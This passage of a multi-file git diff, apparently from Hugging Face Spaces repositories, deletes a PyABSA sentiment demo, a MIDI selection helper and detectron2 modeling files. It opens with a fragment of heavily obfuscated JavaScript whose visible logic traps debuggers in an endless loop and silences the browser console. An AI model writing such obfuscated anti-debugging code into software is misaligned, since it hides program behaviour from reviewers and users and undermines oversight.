_0x27055e===_0x2291f3;},'HXTIF':_0x163385(-0x19a,-0x1b8,-0x174,-0x221,-0x1db),'zkvhK':function(_0x58965a,_0x1cf64e){return _0x58965a/_0x1cf64e;},'iRTzo':_0x37219c(0x1fe,0x328,0x247,0x26b,0x297)+'h','WyYfq':function(_0xe259c1,_0xe77265){return _0xe259c1===_0xe77265;},'GgHUu':function(_0x28418e,_0x3a1021){return _0x28418e%_0x3a1021;},'PJUHq':function(_0x5414d9,_0x418ef1){return _0x5414d9!==_0x418ef1;},'EEfdC':_0x4c92c1(0x1fb,0x2d7,0x1fb,0x1f6,0x351),'dMrUv':_0x163385(-0x2ba,-0x338,-0x28d,-0x243,-0x1ca),'akkft':_0x37219c(0x289,0x2d6,0x2dd,0x30a,0x297),'QkmIN':_0x37219c(0x261,0x2d5,0x344,0x26c,0x338)+'n','TfeVo':function(_0x437857,_0x20c729){return _0x437857===_0x20c729;},'SRWRa':_0x5ef808(-0x133,-0x20b,-0x1be,-0x1ee,-0x2b1),'fEhhE':_0x5ef808(-0x19a,-0x16a,-0x253,-0x1b3,-0x1fb),'ivCFN':function(_0x3b25d2,_0x579938){return 
_0x3b25d2+_0x579938;},'HSAgz':_0x4c92c1(0x3fa,0x405,0x4ca,0x4ba,0x3a2)+_0x37219c(0x3c6,0x324,0x378,0x355,0x3e4)+'t','QYFAI':function(_0x5a0663,_0x2b5acb){return _0x5a0663(_0x2b5acb);},'vokxU':function(_0x48324e,_0x1ce876){return _0x48324e(_0x1ce876);},'FIsIF':function(_0xb0d37a,_0x268cc8){return _0xb0d37a+_0x268cc8;},'AteeO':function(_0x14f153,_0x4faa77){return _0x14f153!==_0x4faa77;},'omHUq':_0x3c56c7(0x249,0x315,0x387,0x245,0x29f),'yIPvi':_0x4c92c1(0x464,0x440,0x458,0x510,0x4b2),'RJqbZ':function(_0xe9c5ee,_0x58d32d){return _0xe9c5ee===_0x58d32d;},'egDib':_0x5ef808(-0x1da,-0x216,-0x2bd,-0x216,-0x2c0),'XQEcL':_0x4c92c1(0x344,0x2d8,0x242,0x2c8,0x220),'wsjSt':function(_0x518aac,_0x208cee){return _0x518aac!==_0x208cee;},'hEApv':_0x163385(-0x1ce,-0xf0,-0x16f,-0x110,-0x150),'nbfbP':_0x4c92c1(0x450,0x3a0,0x479,0x302,0x2f6)};function _0x3c56c7(_0xf43e55,_0x20da71,_0x57dd96,_0x13b696,_0x2a1b56){return _0x5b3717(_0x20da71-0x448,_0xf43e55,_0x57dd96-0x3,_0x13b696-0x25,_0x2a1b56-0x109);}function _0x4dacc1(_0x1f2ebb){function _0x1df5ce(_0x4386d7,_0x5e7f68,_0x51fef2,_0x170730,_0x4e2da0){return _0x163385(_0x4e2da0-0x63,_0x5e7f68-0x5b,_0x4386d7,_0x170730-0x99,_0x4e2da0-0xa0);}function _0x292b63(_0x14cd58,_0x45579e,_0x2d7e99,_0x4188e9,_0x576e87){return _0x37219c(_0x14cd58-0x39,_0x45579e-0x1bf,_0x45579e- -0x4fb,_0x4188e9-0xe1,_0x2d7e99);}function _0x315baa(_0x22d0da,_0x4ec0aa,_0x1c1f1f,_0x5c86ee,_0x3eb224){return _0x163385(_0x5c86ee-0x312,_0x4ec0aa-0x70,_0x3eb224,_0x5c86ee-0x2,_0x3eb224-0x4b);}const _0x36d494={'vxfdZ':function(_0x3959eb,_0x224ba2){function _0x2be67b(_0xc568c3,_0x4e9bfb,_0x217cef,_0x468fe5,_0x46ca2b){return _0x222c(_0xc568c3-0x271,_0x468fe5);}return _0x274a73[_0x2be67b(0x361,0x2f3,0x425,0x43a,0x270)](_0x3959eb,_0x224ba2);},'ffwFQ':_0x274a73[_0x1df5ce(-0x2c8,-0x319,-0x322,-0x29a,-0x28e)],'NRmyP':_0x274a73[_0x315baa(0x16b,0x110,0x8,0x7e,0xff)],'RnvIN':function(_0x5de2d4,_0x18cd5f){function _0x3ccb8d(_0x4a74cb,_0x413af3,_0x32dd1a,_0x301970,_0xcc65fb){return 
_0x315baa(_0x4a74cb-0x42,_0x413af3-0x9a,_0x32dd1a-0xe0,_0x301970-0x3a6,_0x32dd1a);}return _0x274a73[_0x3ccb8d(0x30c,0x34a,0x338,0x3af,0x3ad)](_0x5de2d4,_0x18cd5f);},'CSsds':function(_0x4073a6,_0x588f66){function _0x4a16d6(_0x35a425,_0x23a8d3,_0xd054e1,_0x460c32,_0x5db346){return _0x315baa(_0x35a425-0x139,_0x23a8d3-0x129,_0xd054e1-0x37,_0x35a425- -0x15e,_0x23a8d3);}return _0x274a73[_0x4a16d6(-0x8a,-0x77,-0x49,-0xaf,0xe)](_0x4073a6,_0x588f66);},'WZqeI':function(_0x57f75a,_0x26cedb){function _0x414327(_0x59b6a7,_0x5c7132,_0x7a43a9,_0x316bea,_0x5dcca1){return _0x315baa(_0x59b6a7-0xea,_0x5c7132-0xc7,_0x7a43a9-0x186,_0x5c7132-0x346,_0x5dcca1);}return _0x274a73[_0x414327(0x43b,0x359,0x2b1,0x36b,0x447)](_0x57f75a,_0x26cedb);},'vyEiL':_0x274a73[_0x56c700(0xb0,-0x51,0x64,-0x29,0x32)],'FXgKD':_0x274a73[_0x56c700(0x29,0xe8,0xd8,-0xc1,0x29)],'ThJCG':function(_0xc5adb6){function _0x22e575(_0x3d9595,_0x58dc5b,_0x479fe3,_0x473776,_0x399d2c){return _0x1df5ce(_0x399d2c,_0x58dc5b-0xd9,_0x479fe3-0x8e,_0x473776-0x4,_0x479fe3- -0x65);}return _0x274a73[_0x22e575(-0x26b,-0x2cd,-0x268,-0x222,-0x2de)](_0xc5adb6);},'EIIdK':_0x274a73[_0x315baa(0x211,0x15e,0x1c5,0x1b3,0x1b7)],'SyCzk':_0x274a73[_0x1df5ce(-0x1cf,-0x178,-0x17b,-0xc9,-0x152)],'RAplO':_0x274a73[_0x292b63(-0x218,-0x26f,-0x1b2,-0x268,-0x2c5)],'SAPOu':_0x274a73[_0x292b63(-0x16d,-0x1d9,-0x23d,-0x29c,-0x108)],'igXwh':_0x274a73[_0x292b63(-0x126,-0x1b8,-0x2a1,-0x1b9,-0xeb)],'BKGxW':_0x274a73[_0x315baa(0xa9,0x209,0x16f,0x14d,0xf0)],'uPIuo':_0x274a73[_0x56c700(0x88,0x32,0x62,-0x7,0x97)],'CzlDj':function(_0x24a5bb,_0x5e10fe){function _0x413088(_0x2369b,_0x3ef86f,_0x354a60,_0x3c8007,_0x541309){return _0x286c2e(_0x2369b-0x155,_0x3ef86f-0x20,_0x354a60-0x1cc,_0x3c8007-0xb9,_0x3c8007);}return _0x274a73[_0x413088(0x3a2,0x33b,0x24c,0x2ac,0x2b0)](_0x24a5bb,_0x5e10fe);}};function _0x286c2e(_0x14b5d7,_0x28b217,_0x361a48,_0x49b38a,_0x126475){return _0x4c92c1(_0x14b5d7-0x135,_0x28b217- -0x5e,_0x361a48-0x32,_0x126475,_0x126475-0x23);}function 
_0x56c700(_0x51a59e,_0x265bb8,_0x2ce528,_0xb6c224,_0x2035c1){return _0x5ef808(_0x51a59e-0x1dc,_0x265bb8-0x163,_0x2ce528-0xd3,_0x2035c1-0x315,_0xb6c224);}if(_0x274a73[_0x286c2e(0x2b6,0x363,0x2b9,0x3bf,0x275)](_0x274a73[_0x315baa(-0x6,0xfb,-0x8d,0x61,0x148)],_0x274a73[_0x286c2e(0x259,0x2e7,0x3b2,0x2f9,0x30e)])){if(_0x274a73[_0x1df5ce(-0x1a3,-0x1eb,-0x29d,-0x1fb,-0x1d7)](typeof _0x1f2ebb,_0x274a73[_0x1df5ce(-0x150,-0x37,-0x9,-0x129,-0xf8)])){if(_0x274a73[_0x286c2e(0x46f,0x3ba,0x2f3,0x476,0x445)](_0x274a73[_0x286c2e(0x2d6,0x3b8,0x2fc,0x39b,0x37c)],_0x274a73[_0x1df5ce(-0x29f,-0x2da,-0x330,-0x325,-0x280)]))return function(_0x4925d3){}[_0x315baa(0xd3,0x1dc,0x135,0x108,0x68)+_0x292b63(-0x287,-0x2da,-0x20b,-0x397,-0x246)+'r'](_0x274a73[_0x1df5ce(-0x202,-0x14a,-0x173,-0xd7,-0x125)])[_0x286c2e(0x407,0x3e0,0x3d1,0x45c,0x318)](_0x274a73[_0x286c2e(0x31d,0x2a4,0x2f9,0x2a2,0x301)]);else{if(_0x39b16c)return _0x1925b8;else _0x274a73[_0x315baa(-0xda,0x0,0x2,0x9,0xe0)](_0x101893,0x70e+0x101f*0x1+-0x172d);}}else{if(_0x274a73[_0x56c700(0x67,0x11d,0x15f,0x1e7,0x136)](_0x274a73[_0x292b63(-0x131,-0x1f4,-0x2c4,-0x2a0,-0x237)],_0x274a73[_0x56c700(0x1ed,0x244,0x23f,0x20a,0x156)])){if(_0x274a73[_0x292b63(-0x19f,-0x1ce,-0x29f,-0x168,-0x108)](_0x274a73[_0x292b63(-0x3af,-0x2ef,-0x294,-0x30e,-0x279)]('',_0x274a73[_0x1df5ce(-0x1de,-0x105,-0x15f,-0x1cc,-0x134)](_0x1f2ebb,_0x1f2ebb))[_0x274a73[_0x292b63(-0x31e,-0x26c,-0x2ea,-0x219,-0x336)]],0x1*0x1894+-0x1e6*-0x1+-0x1*0x1a79)||_0x274a73[_0x286c2e(0x43d,0x3e5,0x311,0x416,0x43e)](_0x274a73[_0x315baa(-0xaf,0x96,-0xa9,0x38,0x8a)](_0x1f2ebb,-0x2647+0x990+0x51*0x5b),0xcc7+-0x226d+0xa3*0x22)){if(_0x274a73[_0x286c2e(0x3f5,0x360,0x279,0x44d,0x392)](_0x274a73[_0x56c700(0x1f2,0x110,0x125,0x1e3,0x1bd)],_0x274a73[_0x292b63(-0x1dc,-0x18d,-0x205,-0x22b,-0x9d)])){const 
_0x43262d=_0x684335[_0x1df5ce(-0x277,-0x27f,-0x1e6,-0x26d,-0x1a7)+_0x292b63(-0x2bf,-0x2da,-0x33f,-0x355,-0x39f)+'r'][_0x315baa(0x124,0x161,0x15b,0x189,0x137)+_0x56c700(0xc9,0x184,0x95,0x1ea,0x11b)][_0x315baa(0x151,0xf0,0x77,0xae,0x11)](_0x260ca5),_0x4d05b3=_0x30fcfe[_0x4bcff0],_0x246e19=_0xf77b38[_0x4d05b3]||_0x43262d;_0x43262d[_0x56c700(0x1c7,0x1b1,0x61,0x5f,0xf1)+_0x286c2e(0x1ed,0x296,0x1d7,0x256,0x2c8)]=_0xcfbab7[_0x286c2e(0x3db,0x334,0x362,0x3c2,0x2f8)](_0x4d58aa),_0x43262d[_0x286c2e(0x4d8,0x427,0x3bd,0x449,0x514)+_0x292b63(-0x33f,-0x300,-0x3bb,-0x2d9,-0x31a)]=_0x246e19[_0x286c2e(0x388,0x427,0x4b6,0x380,0x517)+_0x286c2e(0x2ec,0x288,0x204,0x28e,0x302)][_0x286c2e(0x3fe,0x334,0x3c7,0x32e,0x397)](_0x246e19),_0x146534[_0x4d05b3]=_0x43262d;}else(function(){function _0x211536(_0x2a2ec9,_0x41a5df,_0x1cc2c8,_0x448a30,_0x2348d1){return _0x56c700(_0x2a2ec9-0x55,_0x41a5df-0x130,_0x1cc2c8-0x121,_0x2348d1,_0x448a30- -0x104);}function _0x33fd27(_0x1fc3cd,_0x4560b,_0xd10f2,_0xc63e04,_0x369d8b){return _0x315baa(_0x1fc3cd-0x9d,_0x4560b-0x15d,_0xd10f2-0xd9,_0xd10f2-0x3ee,_0x4560b);}function _0x30472a(_0x1059da,_0x359c8f,_0x26274b,_0x233917,_0x2a0e44){return _0x315baa(_0x1059da-0x129,_0x359c8f-0x27,_0x26274b-0x38,_0x233917-0x2c0,_0x1059da);}function _0x4e1c90(_0x134d49,_0x5ecc47,_0x5b5911,_0x3c7817,_0xe475e2){return _0x1df5ce(_0xe475e2,_0x5ecc47-0x130,_0x5b5911-0x124,_0x3c7817-0xcb,_0x5b5911-0x179);}function _0x2c9db6(_0x47552d,_0x1bb639,_0x3ea939,_0x234693,_0x386f79){return _0x286c2e(_0x47552d-0x1ae,_0x234693- -0x287,_0x3ea939-0xfb,_0x234693-0xa3,_0x1bb639);}if(_0x274a73[_0x2c9db6(-0x79,-0x4,-0x56,0x5d,-0x4)](_0x274a73[_0x2c9db6(0x85,0x8c,-0x33,-0x1e,0xd3)],_0x274a73[_0x33fd27(0x416,0x3c0,0x3d1,0x338,0x3b2)]))return!![];else 
_0xbe906e[_0x30472a(0x245,0x2c3,0x367,0x2db,0x31f)](_0x4e1c90(-0xe0,-0x51,-0x101,-0x1c5,-0x150)+_0x33fd27(0x4b2,0x432,0x422,0x3b7,0x3ae)+_0x2c9db6(0x17d,0x113,0x1e8,0x13a,0x1fc)+_0x211536(-0xa,0x132,-0x56,0x43,0xff)+_0x2c9db6(0xb0,0x191,0x146,0xe7,0xa)+'\x20'+_0x398d92);}[_0x286c2e(0x300,0x38e,0x3eb,0x3f6,0x311)+_0x292b63(-0x244,-0x2da,-0x2ec,-0x349,-0x2e8)+'r'](_0x274a73[_0x56c700(-0x27,0xee,-0x81,0xab,0x5b)](_0x274a73[_0x286c2e(0x3ec,0x407,0x4b0,0x38d,0x4f8)],_0x274a73[_0x56c700(0xcb,0x78,0x51,0x183,0x137)]))[_0x292b63(-0x2a8,-0x319,-0x273,-0x357,-0x308)](_0x274a73[_0x286c2e(0x43f,0x35f,0x2eb,0x346,0x38e)]));}else _0x274a73[_0x286c2e(0x22d,0x311,0x2b1,0x3d3,0x243)](_0x274a73[_0x286c2e(0x430,0x356,0x441,0x369,0x424)],_0x274a73[_0x286c2e(0x38b,0x38c,0x3ff,0x47c,0x3f2)])?_0x1f49b7[_0x315baa(-0xd3,0x100,0xef,0x1b,0xfc)](_0x1df5ce(-0x140,-0x25e,-0x234,-0x19a,-0x1f7)+_0x286c2e(0x242,0x287,0x328,0x1b0,0x1cb)+_0x315baa(0x134,-0x1f,0xf0,0x68,0x12c)+_0x292b63(-0x143,-0x1f9,-0x22b,-0x131,-0x2cc)+_0x286c2e(0x4c6,0x40e,0x41a,0x32f,0x494)+_0x286c2e(0x3e8,0x326,0x2ae,0x2a5,0x3a6)+_0x16a84a):function(){function _0x3daebb(_0x9a03ab,_0x37dd8e,_0x520996,_0x7d7599,_0x428686){return _0x56c700(_0x9a03ab-0x2,_0x37dd8e-0x8d,_0x520996-0xde,_0x520996,_0x37dd8e- -0x35);}function _0x4a4d08(_0x148057,_0x2bddf0,_0x49762d,_0x459365,_0x46d29a){return _0x292b63(_0x148057-0xb9,_0x459365-0x113,_0x46d29a,_0x459365-0x53,_0x46d29a-0x35);}function _0x35a402(_0x423f90,_0x5e706b,_0x5d8a0d,_0x117a44,_0x56245b){return _0x1df5ce(_0x423f90,_0x5e706b-0x102,_0x5d8a0d-0x7c,_0x117a44-0x10d,_0x5e706b-0x5f0);}function _0x5a477a(_0x11ee68,_0x4912c5,_0x47236b,_0x2f288e,_0x117b0e){return _0x292b63(_0x11ee68-0x1bf,_0x11ee68-0x5d3,_0x4912c5,_0x2f288e-0xa,_0x117b0e-0x1be);}if(_0x36d494[_0x3daebb(0x19c,0x10b,0xb2,0xc4,0x1d1)](_0x36d494[_0x3daebb(0x11f,0x127,0x166,0x141,0x1ec)],_0x36d494[_0x3daebb(0xd6,0xcd,0x9a,0x5a,0xdf)])){const _0x50f770=_0x1e56db[_0x4a4d08(-0x89,-0x3e,-0xb1,-0x95,-0x74)](_0x342abc,arguments);return 
_0x2dfae9=null,_0x50f770;}else return![];}[_0x292b63(-0x234,-0x1fa,-0x15d,-0x22f,-0x22d)+_0x1df5ce(-0x29e,-0x288,-0x2ed,-0x2a3,-0x287)+'r'](_0x274a73[_0x286c2e(0x2d9,0x28a,0x288,0x1e0,0x1e4)](_0x274a73[_0x286c2e(0x41b,0x407,0x486,0x35a,0x34c)],_0x274a73[_0x286c2e(0x356,0x375,0x45c,0x3af,0x387)]))[_0x286c2e(0x44b,0x3e0,0x3d9,0x33a,0x413)](_0x274a73[_0x286c2e(0x292,0x329,0x30f,0x3ad,0x26c)]);}else{const _0x1e6bb6=_0x122d56[_0x1df5ce(-0x137,-0x102,-0xa6,-0x7b,-0x155)](_0x680e0c,arguments);return _0x47d3e4=null,_0x1e6bb6;}}_0x274a73[_0x315baa(0x12d,0xe5,0xb4,0x5c,0x137)](_0x4dacc1,++_0x1f2ebb);}else{let _0x4d39a7;try{const _0x57e87a=_0x36d494[_0x56c700(0x221,0x2b3,0x285,0x18a,0x1fd)](_0x5e3f46,_0x36d494[_0x286c2e(0x31e,0x2cb,0x341,0x26f,0x36f)](_0x36d494[_0x1df5ce(-0x28d,-0x23d,-0x246,-0x179,-0x263)](_0x36d494[_0x56c700(0x1ae,0x121,0xc8,0x1d5,0x142)],_0x36d494[_0x292b63(-0x217,-0x19d,-0x18f,-0x18c,-0x1fe)]),');'));_0x4d39a7=_0x36d494[_0x315baa(0x1b0,0xb5,0x59,0xe3,0xa4)](_0x57e87a);}catch(_0x18b37e){_0x4d39a7=_0x24fb6b;}const _0x510e9f=_0x4d39a7[_0x292b63(-0x365,-0x2be,-0x37e,-0x366,-0x2c7)+'le']=_0x4d39a7[_0x315baa(0x12f,0x49,0xe7,0x44,0x13)+'le']||{},_0x1bc6ab=[_0x36d494[_0x56c700(0x199,0x1ac,0x100,0xd4,0xc8)],_0x36d494[_0x292b63(-0x241,-0x1c0,-0x219,-0x134,-0x2b0)],_0x36d494[_0x56c700(0xfc,0xfa,0x209,0x134,0x149)],_0x36d494[_0x56c700(0xfb,0xcb,0x122,0xfb,0x50)],_0x36d494[_0x1df5ce(-0x1fd,-0x7c,-0xb9,-0x16c,-0x11d)],_0x36d494[_0x1df5ce(-0x249,-0x1ef,-0xcf,-0x1a8,-0x15d)],_0x36d494[_0x292b63(-0x260,-0x20d,-0x1b5,-0x219,-0x1b9)]];for(let _0x228541=-0x264e+0x112e+0x1520;_0x36d494[_0x1df5ce(-0x1d6,-0x167,-0x2e2,-0x236,-0x1f1)](_0x228541,_0x1bc6ab[_0x292b63(-0x2a9,-0x2b4,-0x2d2,-0x24a,-0x317)+'h']);_0x228541++){const 
_0x3d0927=_0x275b00[_0x286c2e(0x38f,0x38e,0x472,0x3c2,0x450)+_0x315baa(-0x23,0xd,0xdc,0x28,-0x26)+'r'][_0x1df5ce(-0xc0,-0x1d0,-0x1a3,-0x45,-0x126)+_0x292b63(-0x24f,-0x22f,-0x235,-0x21c,-0x1ed)][_0x1df5ce(-0x203,-0x2d3,-0x243,-0x136,-0x201)](_0x50ba5a),_0x4f0687=_0x1bc6ab[_0x228541],_0x44c38c=_0x510e9f[_0x4f0687]||_0x3d0927;_0x3d0927[_0x1df5ce(-0x179,-0x2e7,-0x239,-0x127,-0x206)+_0x56c700(0xd9,-0x85,0x122,0xda,0x58)]=_0x366acb[_0x292b63(-0x2fa,-0x254,-0x22c,-0x1e1,-0x30d)](_0x5ce843),_0x3d0927[_0x56c700(0x1f1,0x135,0x17a,0x26b,0x1e9)+_0x315baa(0x9c,-0x50,-0x79,0x2,0xbc)]=_0x44c38c[_0x315baa(0x22a,0x144,0x144,0x1a1,0x17c)+_0x56c700(-0x64,0xbb,0xb7,0xa0,0x4a)][_0x1df5ce(-0x187,-0x25e,-0x246,-0x13f,-0x201)](_0x44c38c),_0x510e9f[_0x4f0687]=_0x3d0927;}}}function _0x4c92c1(_0x31556a,_0x459b40,_0x395ee7,_0x195162,_0x4d9d70){return _0x504eae(_0x459b40-0xc1,_0x459b40-0xa1,_0x395ee7-0x126,_0x195162-0xed,_0x195162);}function _0x5ef808(_0x313b76,_0x3f475c,_0x527422,_0x576a4e,_0xd60573){return _0x1d31e6(_0x576a4e- -0x345,_0x3f475c-0x74,_0xd60573,_0x576a4e-0x156,_0xd60573-0xa9);}function _0x163385(_0x27c341,_0x53ff3b,_0x3d059a,_0x536423,_0x42ac09){return _0x5b3717(_0x27c341- -0x66,_0x3d059a,_0x3d059a-0xa,_0x536423-0xce,_0x42ac09-0x2e);}function _0x37219c(_0xca9036,_0x4dc92e,_0x422991,_0x54701d,_0x40f6bf){return _0x1e3602(_0xca9036-0xa4,_0x40f6bf,_0x422991-0x126,_0x422991-0x2b2,_0x40f6bf-0x46);}try{if(_0x274a73[_0x4c92c1(0x484,0x3ee,0x351,0x351,0x438)](_0x274a73[_0x163385(-0x1f7,-0x2a5,-0x1bb,-0x148,-0x226)],_0x274a73[_0x5ef808(-0x11f,-0x228,-0x277,-0x1f7,-0x2c2)])){if(_0x505d61){if(_0x274a73[_0x3c56c7(0x37f,0x312,0x357,0x2e0,0x2b6)](_0x274a73[_0x4c92c1(0x275,0x34e,0x301,0x3ad,0x294)],_0x274a73[_0x37219c(0x34c,0x1c9,0x274,0x1b7,0x302)]))_0x274a73[_0x5ef808(-0x28f,-0x303,-0x372,-0x2a8,-0x24f)](_0x478d65,-0xe9*0x13+0x7b8+0x993);else return 
_0x4dacc1;}else{if(_0x274a73[_0x163385(-0x265,-0x2d8,-0x2c6,-0x349,-0x24c)](_0x274a73[_0x37219c(0x336,0x29f,0x249,0x2eb,0x268)],_0x274a73[_0x5ef808(-0x20d,-0x12a,-0x19a,-0x1d1,-0x21f)]))_0x274a73[_0x5ef808(-0x22a,-0x36f,-0x2bd,-0x2a8,-0x2b0)](_0x4dacc1,-0x231+-0x3*0xcdb+0x28c2);else{let _0x5d9b75;try{_0x5d9b75=_0x274a73[_0x5ef808(-0x23d,-0x2cd,-0x274,-0x271,-0x2c9)](_0x58446f,_0x274a73[_0x5ef808(-0x2bd,-0x136,-0x214,-0x1f9,-0x150)](_0x274a73[_0x4c92c1(0x30d,0x38b,0x2b8,0x352,0x325)](_0x274a73[_0x4c92c1(0x3ba,0x2ce,0x296,0x295,0x2ea)],_0x274a73[_0x3c56c7(0x1ce,0x17d,0x137,0x18b,0x20d)]),');'))();}catch(_0x724811){_0x5d9b75=_0xa22605;}return _0x5d9b75;}}}else{if(_0x47e411){const _0x386471=_0x3c6c2a[_0x4c92c1(0x4c4,0x43e,0x415,0x449,0x374)](_0x5e66a5,arguments);return _0x2b067c=null,_0x386471;}}}catch(_0x399381){}} diff --git a/spaces/yangheng/PyABSA-APC/app.py b/spaces/yangheng/PyABSA-APC/app.py deleted file mode 100644 index 0e67f7239243c44be5ff8d65e57aef30dfa9f8f9..0000000000000000000000000000000000000000 --- a/spaces/yangheng/PyABSA-APC/app.py +++ /dev/null @@ -1,52 +0,0 @@ -# -*- coding: utf-8 -*- -# file: deploy_demo.py -# time: 2021/10/10 -# author: yangheng -# github: https://github.com/yangheng95 -# Copyright (C) 2021. All Rights Reserved. 
- -import gradio as gr -import pandas as pd - -from pyabsa import APCCheckpointManager - -sentiment_classifier = APCCheckpointManager.get_sentiment_classifier(checkpoint='multilingual', - auto_device=True # False means load model on CPU - ) - - -def inference(text): - result = sentiment_classifier.infer(text=text, - print_result=True, - ignore_error=False, - clear_input_samples=True) - - result = pd.DataFrame({ - 'aspect': result['aspect'], - 'sentiment': result['sentiment'], - 'confidence': [round(c, 3) for c in result['confidence']], - 'ref_sentiment': ['' if ref == '-999' else ref for ref in result['ref_sentiment']], - 'is_correct': result['ref_check'], - }) - - return result - - -if __name__ == '__main__': - iface = gr.Interface( - fn=inference, - inputs=["text"], - examples=[ - ['Strong build though which really adds to its [ASP]durability[ASP] .'], # !sent! Positive - ['Strong [ASP]build[ASP] though which really adds to its durability . !sent! Positive'], - ['The [ASP]battery life[ASP] is excellent - 6-7 hours without charging . !sent! Positive'], - ['I have had my [ASP]computer[ASP] for 2 weeks already and it [ASP]works[ASP] perfectly . !sent! Positive, Positive'], - ['And I may be the only one but I am really liking [ASP]Windows 8[ASP] . !sent! 
Positive'], - ['This demo is trained on the laptop and restaurant and other review datasets from [ASP]ABSADatasets[ASP] (https://github.com/yangheng95/ABSADatasets)'], - ['To fit on your data, please train the model on your own data, see the [ASP]PyABSA[ASP] (https://github.com/yangheng95/PyABSA)'], - ], - outputs="dataframe", - title='Multilingual Aspect Sentiment Classification for Short Texts (powered by PyABSA)' - ) - - iface.launch(share=True) diff --git a/spaces/yderre-aubay/midi-player-demo/src/common/selection/ArrangeSelection.ts b/spaces/yderre-aubay/midi-player-demo/src/common/selection/ArrangeSelection.ts deleted file mode 100644 index 359a08dbf60e2127a73c187a444a06cfce2d9ec0..0000000000000000000000000000000000000000 --- a/spaces/yderre-aubay/midi-player-demo/src/common/selection/ArrangeSelection.ts +++ /dev/null @@ -1,72 +0,0 @@ -import Quantizer from "../quantizer" -import { ArrangePoint } from "../transform/ArrangePoint" - -export interface ArrangeSelection { - fromTick: number - fromTrackIndex: number - toTick: number - toTrackIndex: number -} - -export function arrangeSelectionFromPoints( - start: ArrangePoint, - end: ArrangePoint, - quantizer: Quantizer, - maxTrackIndex: number, -): ArrangeSelection { - const startSelection = selectionForPoint(start, quantizer) - const endSelection = selectionForPoint(end, quantizer) - return clampSelection( - unionSelections(startSelection, endSelection), - maxTrackIndex, - ) -} - -export const selectionForPoint = ( - point: ArrangePoint, - quantizer: Quantizer, -): ArrangeSelection => { - const fromTick = quantizer.floor(point.tick) - const toTick = quantizer.ceil(point.tick) - return { - fromTick, - toTick, - fromTrackIndex: Math.floor(point.trackIndex), - toTrackIndex: Math.floor(point.trackIndex) + 1, - } -} - -export const unionSelections = ( - a: ArrangeSelection, - b: ArrangeSelection, -): ArrangeSelection => { - return { - fromTick: Math.min(a.fromTick, b.fromTick), - toTick: Math.max(a.toTick, b.toTick), 
- fromTrackIndex: Math.min(a.fromTrackIndex, b.fromTrackIndex), - toTrackIndex: Math.max(a.toTrackIndex, b.toTrackIndex), - } -} - -export const clampSelection = ( - selection: ArrangeSelection, - maxTrackIndex: number, -): ArrangeSelection => ({ - fromTick: Math.max(0, selection.fromTick), - toTick: Math.max(0, selection.toTick), - fromTrackIndex: Math.min( - maxTrackIndex, - Math.max(0, selection.fromTrackIndex), - ), - toTrackIndex: Math.min(maxTrackIndex, Math.max(0, selection.toTrackIndex)), -}) - -export const movedSelection = ( - selection: ArrangeSelection, - delta: ArrangePoint, -): ArrangeSelection => ({ - fromTick: selection.fromTick + delta.tick, - toTick: selection.toTick + delta.tick, - fromTrackIndex: selection.fromTrackIndex + delta.trackIndex, - toTrackIndex: selection.toTrackIndex + delta.trackIndex, -}) diff --git a/spaces/yerfor/SyntaSpeech/modules/vocoder/parallel_wavegan/models/__init__.py b/spaces/yerfor/SyntaSpeech/modules/vocoder/parallel_wavegan/models/__init__.py deleted file mode 100644 index 4803ba6b2a0afc8022e756ae5b3f4c7403c3c1bd..0000000000000000000000000000000000000000 --- a/spaces/yerfor/SyntaSpeech/modules/vocoder/parallel_wavegan/models/__init__.py +++ /dev/null @@ -1,2 +0,0 @@ -from .melgan import * # NOQA -from .parallel_wavegan import * # NOQA diff --git a/spaces/ynhe/AskAnything/models/grit_src/third_party/CenterNet2/detectron2/modeling/__init__.py b/spaces/ynhe/AskAnything/models/grit_src/third_party/CenterNet2/detectron2/modeling/__init__.py deleted file mode 100644 index 576493de77c361928ebd2491cb490113522f42d6..0000000000000000000000000000000000000000 --- a/spaces/ynhe/AskAnything/models/grit_src/third_party/CenterNet2/detectron2/modeling/__init__.py +++ /dev/null @@ -1,59 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. 
-from detectron2.layers import ShapeSpec - -from .anchor_generator import build_anchor_generator, ANCHOR_GENERATOR_REGISTRY -from .backbone import ( - BACKBONE_REGISTRY, - FPN, - Backbone, - ResNet, - ResNetBlockBase, - build_backbone, - build_resnet_backbone, - make_stage, -) -from .meta_arch import ( - META_ARCH_REGISTRY, - SEM_SEG_HEADS_REGISTRY, - GeneralizedRCNN, - PanopticFPN, - ProposalNetwork, - RetinaNet, - SemanticSegmentor, - build_model, - build_sem_seg_head, - FCOS, -) -from .postprocessing import detector_postprocess -from .proposal_generator import ( - PROPOSAL_GENERATOR_REGISTRY, - build_proposal_generator, - RPN_HEAD_REGISTRY, - build_rpn_head, -) -from .roi_heads import ( - ROI_BOX_HEAD_REGISTRY, - ROI_HEADS_REGISTRY, - ROI_KEYPOINT_HEAD_REGISTRY, - ROI_MASK_HEAD_REGISTRY, - ROIHeads, - StandardROIHeads, - BaseMaskRCNNHead, - BaseKeypointRCNNHead, - FastRCNNOutputLayers, - build_box_head, - build_keypoint_head, - build_mask_head, - build_roi_heads, -) -from .test_time_augmentation import DatasetMapperTTA, GeneralizedRCNNWithTTA -from .mmdet_wrapper import MMDetBackbone, MMDetDetector - -_EXCLUDE = {"ShapeSpec"} -__all__ = [k for k in globals().keys() if k not in _EXCLUDE and not k.startswith("_")] - - -from detectron2.utils.env import fixup_module_metadata - -fixup_module_metadata(__name__, globals(), __all__) -del fixup_module_metadata diff --git a/spaces/ynhe/AskAnything/models/grit_src/third_party/CenterNet2/tests/config/test_yacs_config.py b/spaces/ynhe/AskAnything/models/grit_src/third_party/CenterNet2/tests/config/test_yacs_config.py deleted file mode 100644 index 01dd6955f78e2700ffc10ed723ab1c95df0e5a18..0000000000000000000000000000000000000000 --- a/spaces/ynhe/AskAnything/models/grit_src/third_party/CenterNet2/tests/config/test_yacs_config.py +++ /dev/null @@ -1,270 +0,0 @@ -#!/usr/bin/env python -# Copyright (c) Facebook, Inc. and its affiliates. 
